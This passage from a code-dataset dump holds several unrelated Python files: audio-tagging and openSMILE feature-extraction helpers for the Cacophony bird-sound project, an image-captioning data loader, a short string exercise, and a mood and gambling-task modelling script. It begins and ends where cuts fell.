else:\n print('going to insert tag')\n\n sql = ''' INSERT INTO tags(recording_id,server_Id, what, detail, confidence, startTime, duration, automatic, version, createdAt, tagger_username, deviceId, device_name, device_super_name)\n VALUES(?,?,?,?,?,?,?,?,?,?,?,?,?,?) '''\n cur = get_database_connection().cursor()\n cur.execute(sql, (recording_id,server_Id, what, detail, confidence, startTime, duration, automatic, version, createdAt, tagger_username, deviceId, device_name, device_super_name))\n get_database_connection().commit()\n except Exception as e:\n print(e, '\\n')\n print('\\t\\tUnable to insert tag ' + str(recording_id), '\\n') \n \ndef insert_locally_created_tag_into_database(recording_id,what, detail, confidence, startTime, duration, createdAt, tagger_username, deviceId, device_name, device_super_name ):\n # Use this if the tag was created in this application rather than being downloaded from the server, because some fields are missing e.g. server_Id\n try: \n\n sql = ''' INSERT INTO tags(recording_id, what, detail, confidence, startTime, duration, createdAt, tagger_username, deviceId, device_name, device_super_name)\n VALUES(?,?,?,?,?,?,?,?,?,?,?) 
'''\n cur = get_database_connection().cursor()\n cur.execute(sql, (recording_id, what, detail, confidence, startTime, duration, createdAt, tagger_username, deviceId, device_name, device_super_name))\n get_database_connection().commit()\n except Exception as e:\n print(e, '\\n')\n print('\\t\\tUnable to insert tag ' + str(recording_id), '\\n') \n \ndef test_insert_tag_into_database():\n insert_tag_into_database(1,135940, 'bat', 'detail', 'confidence', 1.2, 2.5, 'automatic', 256, '2019-06-20T04:14:24.811Z', 'timhot', 'deviceId', 'device_name', 'device_super_name')\n \ndef check_if_tag_alredy_in_database(server_Id):\n cur = get_database_connection().cursor()\n cur.execute(\"SELECT server_Id FROM tags WHERE server_Id = ?\", (server_Id,))\n data=cur.fetchone()\n if data is None:\n return False\n else:\n return True\n\ndef test_check_if_tag_alredy_in_database(): \n check_if_tag_alredy_in_database(135939) \n \ndef get_all_tags_for_all_devices_in_local_database():\n user_token = get_cacophony_user_token()\n unique_devices = get_unique_devices_stored_locally()\n\n for unique_device in unique_devices: \n deviceId = unique_device[0]\n device_name = unique_device[1]\n device_super_name = unique_device[2] \n \n recording_type = 'audio'\n recordings_with_tags = get_audio_recordings_with_tags_information_from_server(user_token, recording_type, deviceId)\n\n for recording_with_tag in recordings_with_tags:\n print('device is', deviceId, '\\n') \n recording_id =recording_with_tag['id']\n print('recording_id ', recording_id, '\\n')\n get_and_store_tag_information_for_recording(str(recording_id), deviceId, device_name, device_super_name)\n print('Finished getting tags from server')\n \ndef test_get_all_tags_for_all_devices_in_local_database():\n get_all_tags_for_all_devices_in_local_database() \n \ndef get_unique_devices_stored_locally():\n cur = get_database_connection().cursor()\n cur.execute(\"SELECT DISTINCT deviceId, device_name, device_super_name FROM recordings\") \n rows = cur.fetchall()\n return rows \n \n \ndef test_get_unique_devices_stored_locally():\n unique_devices = get_unique_devices_stored_locally()\n for unique_device in unique_devices:\n print(unique_device, '\\n')\n \ndef scan_local_folder_for_recordings_not_in_local_db_and_update(device_name, device_super_name):\n recordings_folder = getRecordingsFolder()\n for filename in os.listdir(recordings_folder):\n recording_id = filename.replace('-','.').split('.')[0]\n print(recording_id)\n cur = get_database_connection().cursor()\n cur.execute(\"SELECT * FROM recordings WHERE recording_id = ?\",(recording_id,))\n \n # https://stackoverflow.com/questions/16561362/python-how-to-check-if-a-result-set-is-empty\n row = cur.fetchone()\n if row == None:\n # Get the information for this recording from server and insert into local db\n # update_recording_information_for_single_recording(recording_id)\n filename = recording_id + '.m4a'\n insert_recording_into_database(recording_id,filename, device_name,device_super_name) # The device name will be updated next when getting infor from server\n # Now update this recording with information from server\n update_recording_information_for_single_recording(recording_id)\n \ndef test_scan_local_folder_for_recordings_not_in_local_db_and_update():\n scan_local_folder_for_recordings_not_in_local_db_and_update('grants shed')\n \ndef create_tags_from_folder_of_unknown_images():\n # This will probably only get used to recreate the unknown tags from the unknown images - as I'm not sure where the text file of this 
is/exists\n home = str(Path.home())\n unknown_images_folder = home + '/Work/Cacophony/images/unknown'\n for filename in os.listdir(unknown_images_folder):\n fileparts = filename.replace('_','.').split('.')\n recording_id = fileparts[0]\n print('recording_id ', recording_id)\n startWholeSecond = fileparts[1]\n print('startWholeSecond ', startWholeSecond)\n startPartSecond = fileparts[2]\n print('startPartSecond ', startPartSecond)\n startTimeSeconds = startWholeSecond + '.' + startPartSecond\n insert_locally_created_tag_into_database(recording_id=recording_id, what='unknown', detail=None, confidence=None, startTime=startTimeSeconds, duration=1.5, createdAt='2019-06-20T05:39:28.391Z', tagger_username='timhot', deviceId=378, device_name='fpF7B9AFNn6hvfVgdrJB', device_super_name='Hammond Park')\n print('Finished creating unknown tags from image files')\n \ndef test_create_tags_from_folder_of_unknown_images():\n create_tags_from_folder_of_unknown_images()\n \ndef update_local_tags_with_version():\n # This is probably only used the once to modify intial rows to indicate they are from my first morepork tagging of Hammond Park\n cur = get_database_connection().cursor()\n cur.execute(\"select ID from tags\")\n \n rows = cur.fetchall() \n \n for row in rows: \n ID = row[0] \n print('ID ', ID) \n sql = ''' UPDATE tags\n SET version = ? \n WHERE ID = ?'''\n cur = get_database_connection().cursor()\n cur.execute(sql, ('morepork_base', ID))\n \n get_database_connection().commit() \n \ndef test_update_local_tags_with_version():\n update_local_tags_with_version()\n \n# def create_clips(device_super_name, what, version, clips_ouput_folder):\ndef create_clips(device_super_name, what, version, run_base_folder, run_folder):\n print(device_super_name, what, version, run_base_folder, run_folder) \n# what_without_spaces = re.sub(' ', '', what)\n# what_without_spaces_dashes = re.sub('-', '_', what_without_spaces) \n# clips_ouput_folder = run_base_folder + '/' + run_folder + '/' + 'audio_clips' + '/' + what_without_spaces_dashes\n# \n# \n# sql = ''' SELECT recording_Id, startTime, duration FROM tags WHERE device_super_name=? AND what=? AND version=? 
''' \n# cur = get_database_connection().cursor()\n# cur.execute(sql, (device_super_name, what, version,)) \n# rows = cur.fetchall() \n# \n# count = 0\n# \n# for row in rows: \n# print('Creating clip ', count, ' of ', len(rows))\n# recording_Id = row[0]\n# start_time_seconds = row[1]\n# duration_seconds = row[2]\n# create_wav_clip(recording_Id, start_time_seconds, duration_seconds, clips_ouput_folder) \n# count = count + 1 \n \ndef create_wav_clip(recording_Id, start_time_seconds, duration_seconds, clips_ouput_folder):\n print(recording_Id)\n audio_in_path = getRecordingsFolder() + '/' + str(recording_Id) + '.m4a'\n# audio_out_folder = getRecordingsFolder() + '/' + what\n if not os.path.exists(clips_ouput_folder):\n# os.mkdir(clips_ouput_folder)\n os.makedirs(clips_ouput_folder) \n \n audio_out_path = clips_ouput_folder + '/' + str(recording_Id) + '_' + str(start_time_seconds) + '_' + str(duration_seconds) + '.wav'\n# print('audio_in_path ', audio_in_path)\n# print('audio_out_path ', audio_out_path)\n# if not os.path.exists(audio_in_path):\n# print('Can not find ', audio_in_path)\n# else:\n# print('Found it')\n \n create_wav(audio_in_path, audio_out_path, start_time_seconds, duration_seconds)\n \n \ndef create_folder(folder_to_create):\n if folder_to_create is None:\n print(\"Please enter a folder name\")\n return\n if not folder_to_create:\n print(\"Please enter a folder name\")\n return\n \n if not os.path.exists(folder_to_create):\n os.mkdir(folder_to_create)\n print(\"Folder \" , folder_to_create , \" Created \") \n \n \n\n\n \ndef run_processDir():\n processDir(search_path,arff_path)\n \n \ndef create_wav(audio_in_path, audio_out_path, start_time_seconds, duration_seconds): \n print('start_time_seconds ', start_time_seconds) \n print('duration_seconds ', duration_seconds) \n y, sr = librosa.load(audio_in_path) \n \n clip_start_array = int((sr * start_time_seconds))\n print('clip_start_array ', clip_start_array)\n clip_end_array = clip_start_array + int((sr * duration_seconds)) \n \n \n if clip_end_array > y.shape[0]:\n print('Clip would end after end of recording')\n return\n \n clip_call_by_array = y[clip_start_array:clip_end_array] \n \n \n \n \n #Save the file \n# wavfile.write(filename=audio_out_path, rate=sr, data=clip_call_by_array)\n# sf.write(file, data, samplerate, subtype, endian, format, closefd)\n# sf.write(file=audio_out_path, data=clip_call_by_array, samplerate=sr, subtype, endian, format, closefd)\n # https://pysoundfile.readthedocs.io/en/0.9.0/\n sf.write(audio_out_path, clip_call_by_array, sr, 'PCM_24')\n# sf.write(audio_out_path, y, sr, 'PCM_24') \n \n\n# run_processDir()\n\n\ndef test_create_wav():\n create_wav('/home/tim/Work/Cacophony/opensmile_weka/m4a_files/161945.m4a', '/home/tim/Work/Cacophony/opensmile_weka/TestAudioInput/161945.wav') \n create_wav('/home/tim/Work/Cacophony/opensmile_weka/m4a_files/161946.m4a', '/home/tim/Work/Cacophony/opensmile_weka/TestAudioInput/161946.wav') \n processDir(search_path,arff_path)\n\n \ndef create_arff_file(base_folder, run_folder, clip_folder, openSmile_config_file):\n clip_folder_without_spaces = re.sub(' ', '_', clip_folder)\n print('base_folder ', base_folder)\n cwd = os.getcwd()\n \n openSmile_config_file_template = cwd + '/template_files/openSmile_config_files/' + openSmile_config_file\n print('openSmile_config_file_template ', openSmile_config_file_template)\n openSmile_config_file_for_this_run = base_folder + '/' + run_folder + '/' + openSmile_config_file\n print('openSmile_config_file_for_this_run ', 
openSmile_config_file_for_this_run)\n shutil.copy2(openSmile_config_file_template, openSmile_config_file_for_this_run)\n \n# arff_template_file_path = cwd + '/template_files/' + arff_template_file\n# arff_template_file_for_this_run = base_folder + '/' + run_folder + '/' + arff_template_file\n# shutil.copy2(arff_template_file_path, arff_template_file_for_this_run)\n \n print('clip_folder', clip_folder_without_spaces)\n \n \n searchDir = base_folder + '/' + run_folder + '/audio_clips/' + clip_folder_without_spaces\n arffDir = base_folder + '/' + run_folder + '/arff_files' \n if not os.path.exists(arffDir):\n os.mkdir(arffDir)\n \n print('searchDir', searchDir)\n print('arffDir', arffDir)\n \n processDir(searchDir, arffDir, openSmile_config_file_for_this_run)\n \n# First version written by Jonah Dearden\ndef processDir( searchDir, arffDir, openSmile_config_file_for_this_run):\n print('openSmile_config_file_for_this_run ', openSmile_config_file_for_this_run)\n \n os.chdir(searchDir)\n i=0\n list_of_files=[]\n # https://www.tutorialspoint.com/python/os_walk.htm\n for root,dir,files in os.walk(searchDir):\n for f in files:\n if re.match(r'.*\\.wav',f):\n list_of_files.append(root+'/'+f)\n \n os.chdir(arffDir)\n \n for i in list_of_files: \n print(i)\n \n print('openSmile_config_file_for_this_run ', openSmile_config_file_for_this_run)\n \n for i in list_of_files: \n name1=re.sub(r'(' + searchDir + '/)(.*)(\\.wav)',r'\\2',i)\n os.system('SMILExtract -C ' + openSmile_config_file_for_this_run + ' -I '+i+' -O '+arffDir+'/'+name1+'.mfcc.arff')\n \n\n \ndef merge_arffs(base_folder, run_folder, arff_template_file):\n #path to directory with arffs\n arffDir = base_folder + '/' + run_folder + '/arff_files'\n arrf_filename = re.sub('_template', '', arff_template_file)\n cwd = os.getcwd()\n arff_template_file_path = cwd + '/template_files/arff_template_files/' + arff_template_file\n arff_template_file_for_this_run = base_folder + '/' + run_folder + '/arff_files/' + arrf_filename\n shutil.copy2(arff_template_file_path, arff_template_file_for_this_run)\n \n os.chdir(arffDir)\n \n counter = 0\n\n #Opens joinedArff.arff and appends\n with open(arrf_filename, \"a\") as f:\n #for each file with the .arff ext in the directroy\n for file in glob.glob(\"*.arff\"):\n #Open the file and read line 996\n print(file)\n a = open(file, \"r\")\n lines = a.readlines()\n \n x = lines[995]\n #Replace class label if necessary\n #This is unnecessary if you have already assigned the classes using the OpenSmile conf.\n #x = x.replace(\"unknown\", \"person\")\n #Writes that line to the joinedArff file\n f.write(x + \"\\n\")\n a.close()\n \n f.close() \n \n arff_template_file_for_this_run_in_run_folder = base_folder + '/' + run_folder + '/' + arrf_filename\n# os.rename(arff_template_file_for_this_run, arff_template_file_for_this_run_in_run_folder)\n shutil.move(arff_template_file_for_this_run, arff_template_file_for_this_run_in_run_folder)\n \n print('Merged arff file created in ', base_folder, '/',run_folder)\n \ndef get_unique_whats_from_local_db():\n cur = get_database_connection().cursor()\n cur.execute(\"SELECT DISTINCT what FROM tags\") \n rows = cur.fetchall() \n \n unique_whats = []\n for row in rows:\n unique_whats.append(row[0])\n return unique_whats \n\ndef getOpenSmileConfigFiles():\n cwd = os.getcwd()\n openSmileConfigFileDir = cwd + '/template_files/openSmile_config_files/'\n openSmileConfigFiles = []\n for file in os.listdir(openSmileConfigFileDir):\n openSmileConfigFiles.append(file) \n \n return 
openSmileConfigFiles\n \ndef getArffTemplateFiles():\n cwd = os.getcwd()\n arrTemplateFileDir = cwd + '/template_files/arff_template_files/'\n\n arffTemplateFiles = []\n for file in os.listdir(arrTemplateFileDir):\n print(file)\n arffTemplateFiles.append(file) \n \n return arffTemplateFiles \n\n\n\ndef choose_clip_folder(base_folder, run_folder):\n start_folder = base_folder + '/' + run_folder + '/audio_clips/'\n clip_folder = filedialog.askdirectory(initialdir=start_folder, title = \"Open the folder you want (Just selecting it won't choose it)\")\n parts = re.split('/', clip_folder)\n clip_folder = parts[len(parts)-1] \n return clip_folder \n\n \n\n \n \n \n ","sub_path":"python/GUI/gui_functions.py","file_name":"gui_functions.py","file_ext":"py","file_size_in_byte":36343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"480193981","text":"import os\nimport torch\nfrom torchvision import transforms\nfrom lib.config import cfg\nfrom datasets import coco_dataset, aic_dataset, combined_dataset\nimport samplers.distributed\nimport numpy as np\ndef padding_sentences(sentences, max_length=None, padding_index=0):\n #target -1 \n #input 0\n if type(sentences[0][0])==list: # [[5*s],[5*s],...,[5*s]] or [s11,s12,s13,...]\n sentences_ = []\n for ss in sentences:#[s1,s2,s3,...,s4,s5]\n sentences_ += ss \n sentences = sentences_\n if max_length==None:\n max_length = max([len(s) for s in sentences])\n pad_sentences = []\n for s in sentences:\n pad_s = s+[padding_index]*(max_length-len(s))\n pad_sentences.append(pad_s)\n return pad_sentences, max_length\n\ndef sample_collate(batch):\n #batch [(indice1, input_seq1,...),(indice2, input_seq2)]\n #zip(*batch)\n #indices = (indice1, indice2)\n #input_seq = (input_seq1, input_seq2)\n #image_ids = (imageid1,id2,...)\n dataset_names = [b[1] for b in batch]\n info_items = [b[0] for b in batch]\n indices, input_seq, target_seq, gv_feat, att_feats, image_ids = zip(*info_items)\n\n\n indices = np.stack(indices, axis=0).reshape(-1)\n image_ids = np.stack(image_ids, axis=0).reshape(-1)\n # input_seq = torch.cat([torch.from_numpy(b) for b in input_seq], 0)# b 5,L 5*bs,L\n # target_seq = torch.cat([torch.from_numpy(b) for b in target_seq], 0)\n input_seq, max_input_length = padding_sentences(input_seq, max_length=None, padding_index=0)\n target_seq, _ = padding_sentences(target_seq, max_length=max_input_length, padding_index=-1)\n input_seq = torch.LongTensor(input_seq)\n target_seq = torch.LongTensor(target_seq)\n\n #input_lengths = [b.shape[1] for b in input_seq] #5,L\n #max_input_length = max(input_lengths)\n\n gv_feat = torch.cat([torch.from_numpy(b) for b in gv_feat], 0)\n\n atts_num = [x.shape[0] for x in att_feats] #x = bbox, 2048\n max_att_num = np.max(atts_num)\n\n feat_arr = []\n mask_arr = []\n for i, num in enumerate(atts_num):\n tmp_feat = np.zeros((1, max_att_num, att_feats[i].shape[1]), dtype=np.float32)\n tmp_feat[:, 0:att_feats[i].shape[0], :] = att_feats[i]\n feat_arr.append(torch.from_numpy(tmp_feat))\n\n tmp_mask = np.zeros((1, max_att_num), dtype=np.float32)\n tmp_mask[:, 0:num] = 1\n mask_arr.append(torch.from_numpy(tmp_mask))\n\n att_feats = torch.cat(feat_arr, 0)\n att_mask = torch.cat(mask_arr, 0)\n\n return indices, input_seq, target_seq, gv_feat, att_feats, att_mask, image_ids, dataset_names\n\ndef sample_collate_val(batch):\n indices, gv_feat, att_feats, image_ids = zip(*batch)\n \n indices = np.stack(indices, axis=0).reshape(-1)\n image_ids = np.stack(image_ids, axis=0).reshape(-1)\n 
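# (added note, not in the original source) the block below mirrors sample_collate: each image's (num_boxes, feat_dim) attention features are zero-padded up to the batch-wide max box count, and att_mask marks the real rows with 1s, e.g. 3 boxes padded to 5 gives the mask [1, 1, 1, 0, 0].\n    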
gv_feat = torch.cat([torch.from_numpy(b) for b in gv_feat], 0)\n\n    atts_num = [x.shape[0] for x in att_feats]\n    max_att_num = np.max(atts_num)\n\n    feat_arr = []\n    mask_arr = []\n    for i, num in enumerate(atts_num):\n        tmp_feat = np.zeros((1, max_att_num, att_feats[i].shape[1]), dtype=np.float32)\n        tmp_feat[:, 0:att_feats[i].shape[0], :] = att_feats[i]\n        feat_arr.append(torch.from_numpy(tmp_feat))\n\n        tmp_mask = np.zeros((1, max_att_num), dtype=np.float32)\n        tmp_mask[:, 0:num] = 1\n        mask_arr.append(torch.from_numpy(tmp_mask))\n\n    att_feats = torch.cat(feat_arr, 0)\n    att_mask = torch.cat(mask_arr, 0)\n\n    return indices, gv_feat, att_feats, att_mask, image_ids\n\n\ndef load_train(distributed, epoch, data_set):\n    sampler = samplers.distributed.DistributedSampler(data_set, epoch=epoch) \\\n        if distributed else None\n    shuffle = cfg.DATA_LOADER.SHUFFLE if sampler is None else False\n    \n    loader = torch.utils.data.DataLoader(\n        data_set, \n        batch_size = cfg.TRAIN.BATCH_SIZE, #10\n        shuffle = shuffle, #True\n        num_workers = cfg.DATA_LOADER.NUM_WORKERS, #4\n        drop_last = cfg.DATA_LOADER.DROP_LAST, #True\n        pin_memory = cfg.DATA_LOADER.PIN_MEMORY, #True\n        sampler = sampler, \n        collate_fn = sample_collate\n    )\n    return loader\n\ndef load_val(image_ids_path, gv_feat_path, att_feats_folder, dataset_name):\n    if dataset_name=='coco':\n        dataset = coco_dataset.CocoDataset(\n            image_ids_path = image_ids_path, \n            input_seq = None, \n            target_seq = None, \n            gv_feat_path = gv_feat_path, \n            att_feats_folder = att_feats_folder,\n            seq_per_img = 1, \n            max_feat_num = cfg.COCO_DATA_LOADER.MAX_FEAT,\n            id2name_path = cfg.COCO_DATA_LOADER.ID2NAME,\n            annotation_path = cfg.COCO_DATA_LOADER.COCO_ANNOTATION\n        )\n    elif dataset_name=='aic': #\n        dataset = aic_dataset.AICDataset(\n            image_ids_path = image_ids_path, #\n            input_seq = None, #\n            target_seq = None, #\n            gv_feat_path = gv_feat_path, #\n            att_feats_folder = att_feats_folder, #\n            seq_per_img = 1,#5\n            max_feat_num = cfg.AIC_DATA_LOADER.MAX_FEAT,#-1\n            img_dir=cfg.AIC_DATA_LOADER.VAL_IMG_DIR, #val/test the same\n            processedimg_dir=cfg.AIC_DATA_LOADER.VAL_PROCESSEDIMG_DIR #val/test the same\n        )\n\n    loader = torch.utils.data.DataLoader(\n        dataset, \n        batch_size = cfg.TEST.BATCH_SIZE,\n        shuffle = False, \n        num_workers = cfg.DATA_LOADER.NUM_WORKERS, \n        drop_last = False, \n        pin_memory = cfg.DATA_LOADER.PIN_MEMORY, \n        collate_fn = sample_collate_val\n    )\n    return loader","sub_path":"datasets/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":5566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"74236604","text":"'''\nDefine a function that prints the longer of the two strings passed as arguments,\n\n\nand write a program that outputs the result.\n'''\n\ndef calc_str_length():\n    text = input()\n\n    strings = text.split(\",\")\n\n    longestString = ''\n\n    for string in strings:\n        strippedStr = string.strip()\n        if len(strippedStr) > len(longestString):\n            longestString = strippedStr\n\n    return longestString\n\nprint(calc_str_length())\n","sub_path":"PYTHON/파이썬_프로그래밍_기초_문제풀이/08/08-09.py","file_name":"08-09.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"108706587","text":"\n\nimport numpy as np\nimport pandas as pd\n\nfrom wfpt import wfpt_like, wfpt_gen\nfrom scipy.stats import norm\nfrom RunDEMC import dists\n\nclass MMIModel():\n    \"\"\"Generative model of the MMI task\"\"\"\n    default_params = {'gamma': 0.5,\n                      'gamma_neg': None,\n                      #'beta': 1,\n                      #'beta_certain': None,\n 
'a': 3.0,\n 'w': 0.5,\n 't0': 0.25\n #'p0': 0.5,\n }\n \n def __init__(self, params=None, max_time=3.0, \n trange_nsamp=1000, gen_nsamp=1000,\n wfpt_nsamp=5000, ignore_non_resp=False):\n # set params based on defaults and those passed in\n self.params = dict(**self.default_params)\n if params is not None:\n self.params.update(params)\n \n # set the max_time\n self.max_time = max_time\n self.trange_nsamp = trange_nsamp\n self.gen_nsamp = gen_nsamp\n self.wfpt_nsamp = wfpt_nsamp\n self.ignore_non_resp = ignore_non_resp\n \n # initialize stuff\n self.p = 0.5\n if self.params['gamma_neg'] is None:\n # just set it to gamma\n self.params['gamma_neg'] = self.params['gamma']\n# if self.params['beta_certain'] is None:\n# # just set it to beta\n# self.params['beta_certain'] = self.params['beta']\n \n def update_p(self, trial):\n if trial.Choice == 'Gamble':\n RPE = self._apply_gamma(trial['OutcomeAmount']) - trial['LTA']\n #I = float(trial['Won'])\n #beta = self.params['beta']\n elif trial.Choice == 'None':\n # they gambled with a non-response,\n # but maybe didn't make a prediction\n # for now, just treat it like an active gamble\n RPE = self._apply_gamma(trial['OutcomeAmount']) - trial['LTA']\n #I = float(trial['Won'])\n #beta = self.params['beta']\n else:\n # they took certain value\n RPE = 0.0\n \n # move back towards initial probability\n #I = self.params['p0']\n\n # use the certain beta if there is one\n #beta = self.params['beta_certain']\n \n # calc r \n # (we may need to add a temperature param here)\n # (we also could weigh positive and negative RPE differently)\n #r = np.exp(-np.abs(RPE))\n r = 1.0\n \n # update p\n #self.p = r*beta*self.p + (1-r*beta)*I\n self.p=trial['win_prob']\n #self.p = np.clip(self.p + self.params['beta']*RPE, 0, 1)\n \n return self.p, RPE, r\n \n def _apply_gamma(self, value):\n # apply positive or neg gamma (may simply be symmetric)\n if value < 0:\n gamma = self.params['gamma_neg']\n else:\n gamma = self.params['gamma']\n return np.sign(value)*np.abs(value)**gamma\n \n def calc_E(self, trial):\n # determine the certain and gambling expected values\n EC = self._apply_gamma(trial['CertainAmount'])\n EG = self.p*self._apply_gamma(trial['GreaterAmount']) + \\\n (1-self.p)*self._apply_gamma(trial['LesserAmount'])\n return EC,EG\n \n def calc_Reward(self, trial):\n # determine the subjective value\n rwrd = self._apply_gamma(trial['OutcomeAmount'])\n \n return rwrd\n \n def calc_latents(self, trial, latents):\n latents2 = {}\n #latents2['CA_sum'] = self.params['lambda'] * latents['CA_sum']\n #latents2['EG_sum'] = self.params['lambda'] * latents['EG_sum']\n\n latents2['RPE_sum'] = self.params['lambda'] * latents['RPE_sum']\n latents2['LTA_sum'] = self.params['lambda'] * latents['LTA_sum']\n\n latents2['LTA_sum'] = latents2['LTA_sum'] + trial['LTA']\n\n if trial.Choice == 'Gamble':\n #latents2['EG_sum'] = latents2['EG_sum'] + trial['EG']\n #latents2['LTA_sum'] = latents2['LTA_sum'] + trial['EG']\n latents2['RPE_sum'] = latents2['RPE_sum'] + trial['RPE']\n # else:\n # #latents2['CA_sum'] = latents2['CA_sum'] + trial['EC']\n # latents2['LTA_sum'] = latents2['LTA_sum'] + trial['EC']\n return latents2\n \n def calc_trial_like(self, trial, save_post=False):\n # Compute likelihood from reaction time\n # see what response was made and map it to the choice\n if trial.Choice == 'Gamble':\n choice = np.array([1])\n elif trial.Choice == 'Certain':\n choice = np.array([2])\n else:\n # they made no choice\n # we could consider skipping these\n choice = np.array([0])\n\n # calc the 
like\n if self.ignore_non_resp and choice==np.array([0]):\n log_like = 0.0\n else:\n # calc the log like\n log_like = np.log(wfpt_like(choice, np.array([trial.RT]), \n v_mean=trial['Ediff'], a=self.params['a'], \n w_mode=self.params['w'], t0=self.params['t0'],\n nsamp=self.wfpt_nsamp,\n max_time=self.max_time,\n trange_nsamp=self.trange_nsamp))[0]\n \n # * * * * * * * * * * * * * * * * * * * * * * * * * * * *\n # if the trial is also a mood trial we could also add in a like calc\n # for a model, too\n # * * * * * * * * * * * * * * * * * * * * * * * * * * * *\n if np.isnan(trial['Mood']):\n mood_log_like = 0.0 \n \n if not np.isnan(trial['Mood']):\n curr_mood = dists.logit(trial['Mood']/1000)\n pred_mood = self.params['b'] + \\\n self.params['w_LTA'] * trial['LTA_sum'] + \\\n self.params['w_RPE'] * trial['RPE_sum']\n log_like = log_like + np.log(norm.pdf(curr_mood, pred_mood, np.sqrt(self.params['s_v'])))\n \n ##Mood_log_likelihood \n mood_log_like = np.log(norm.pdf(curr_mood, pred_mood, np.sqrt(self.params['s_v'])))\n \n # see if running conditional sim\n if save_post:\n # run wfpt_gen\n choices, rts = wfpt_gen(v_mean=trial['Ediff'], \n a=self.params['a'], \n w_mode=self.params['w'], \n wfpt_nsamp=self.wfpt_nsamp,\n nsamp=self.gen_nsamp, \n trange=np.linspace(0, self.max_time-self.params['t0'], self.trange_nsamp))\n \n # calc prob of making the observed choice\n ind = choices==choice\n p_choice = ind.mean()\n \n # calc mean log rt\n choice_mean_log_rt = np.log(rts[ind]+self.params['t0']).mean()\n \n \n return log_like, p_choice, choice_mean_log_rt\n \n return log_like, mood_log_like \n \n def proc_trials(self, trials, save_posts=False, return_mood_like=False):\n # loop over trials\n #latents = {'CA_sum':0, 'EG_sum':0, 'RPE_sum':0}\n latents = {'LTA_sum':0, 'RPE_sum':0}\n reward_sum=0\n #avg_reward_trial=0\n for i in range(len(trials)):\n # calc_E and save it to the current trial\n EC,EG = self.calc_E(trials.iloc[i])\n trials.at[trials.index[i], 'EC'] = EC\n trials.at[trials.index[i], 'EG'] = EG\n trials.at[trials.index[i], 'Ediff'] = EC-EG\n \n # calc_R and save it to the current trial\n rwrd = self.calc_Reward(trials.iloc[i])\n \n ### Long Term subjective reward calculation (Correction March 12, 2020)\n if i==0:\n trials.at[trials.index[i], 'LTA']=0\n else:\n trials.at[trials.index[i], 'LTA']=reward_sum/trial_num \n reward_sum=reward_sum+rwrd\n trial_num=i+1\n \n\n # update_p (QUESTION: Does it matter whether update_p happens before or after calc likelihood)\n new_p, RPE, r = self.update_p(trials.iloc[i])\n trials.at[trials.index[i], 'new_p'] = new_p\n trials.at[trials.index[i], 'RPE'] = RPE\n trials.at[trials.index[i], 'r'] = r\n # update\n latents = self.calc_latents(trials.iloc[i], latents)\n #trials.at[trials.index[i], 'CA_sum'] = latents['CA_sum']\n trials.at[trials.index[i], 'LTA_sum'] = latents['LTA_sum']\n trials.at[trials.index[i], 'RPE_sum'] = latents['RPE_sum']\n\n \n # calc_trial_like\n if save_posts:\n log_like, p_choice, choice_mean_log_rt = self.calc_trial_like(trials.iloc[i], \n save_post=save_posts)\n trials.at[trials.index[i], 'log_like'] = log_like\n trials.at[trials.index[i], 'p_choice'] = p_choice\n trials.at[trials.index[i], 'choice_mean_log_rt'] = choice_mean_log_rt\n \n else:\n log_like, mood_log_like = self.calc_trial_like(trials.iloc[i])\n trials.at[trials.index[i], 'log_like'] = log_like\n ### Mood_log_like\n trials.at[trials.index[i], 'mood_log_like'] = mood_log_like\n \n \n \n# Reac_time=np.array([trials.at[trials.index[i], 'RT']])\n# 
v_mean=trials.at[trials.index[i], 'Ediff']\n# GAMMA=self.params['gamma']\n# BETA = self.params['beta']\n# A=self.params['a']\n# W=self.params['w']\n# T0=self.params['t0']\n# P0=self.params['p0']\n# Sv=self.params['s_v']\n# LAMBDA=self.params['lambda']\n# WLTA=self.params['w_LTA']\n# WRPE=self.params['w_RPE']\n# B=self.params['b']\n #import pdb; pdb.set_trace()\n if np.isnan(trials.at[trials.index[i], 'log_like']):\n #print((Reac_time,v_mean,GAMMA,BETA,P0,Sv,A,W,T0,LAMBDA,WLTA,WRPE,B), flush=True)\n raise ValueError(\"Log_Like NaN value\") \n if np.isnan(trials.at[trials.index[i], 'mood_log_like']):\n #print((Reac_time,v_mean,GAMMA,BETA,C,P0,Sv), flush=True)\n raise ValueError(\"Mood_Log_Like NaN value\")\n if trials.at[trials.index[i], 'mood_log_like']==None:\n print([trials.index[i], 'mood_log_like'])\n print(trials.at[trials.index[i], 'log_like'])\n raise ValueError(\"Zero value\")\n \n # return trials with useful columns added\n return trials\n\n \n# read in the data\ndef load_mmi_data(filename):\n \n dat = pd.read_csv(filename)\n # ignore rows with no trial info\n dat= dat.dropna(how ='any', subset = ['certainAmount'])\n #dat = dat.loc[~np.isnan(dat.winAmount)]\n dat=dat.reset_index(drop=True)\n # grab the columns of interest\n # CertainAmount, Outcome1Amount (one of the gambling outcomes), \n # Outcome2Amount (one of the gambling outcomes), \n # Outcome (which outcome occurred, certain or Outcome1 or Outcome2), \n # GetAnswer_RT\n# cols = ['CertainAmount', 'Outcome1Amount', 'Outcome2Amount', 'Outcome', 'GetAnswer__RT',\n# 'MoodTarget', 'TrialHappiness__SliderResp', 'DoRating', 'CurrentAmount'\n# ]\n cols=['certainAmount','happySlider.response','winAmount','loseAmount','choiceKey.rt','outcome','doRating']\n dat = dat[cols]\n\n # add useful columns\n # first rename some\n #dat['RT'] = dat['GetAnswer__RT']/1000.\n dat['RT'] = dat['choiceKey.rt'] # original RT data is in seconds\n dat['RT'] = dat['RT'].fillna(0.0) # removing NaN values with 0\n \n #dat.at[12, 'RT'] = 2\n #dat.loc[1,'RT']=2\n dat['Mood'] = dat['happySlider.response']*1000.0 # original Mood data range 0-1\n \n ### replacing Mood Rating 0-->1 and 1000-->999\n dat.Mood = dat.Mood.replace({0: 1.0, 1000: 999.0})\n \n # Certain amount\n dat['CertainAmount'] = dat['certainAmount']\n \n # add a choice\n dat['Choice'] = 'None'\n ind = (dat['RT']>0)\n dat.loc[ind&(dat['outcome']=='certain'), 'Choice'] = 'Certain'\n dat.loc[ind&(dat['outcome']=='win'), 'Choice'] = 'Gamble'\n dat.loc[ind&(dat['outcome']=='lose'), 'Choice'] = 'Gamble'\n\n # add outcome amount\n dat['OutcomeAmount'] = dat['certainAmount']\n 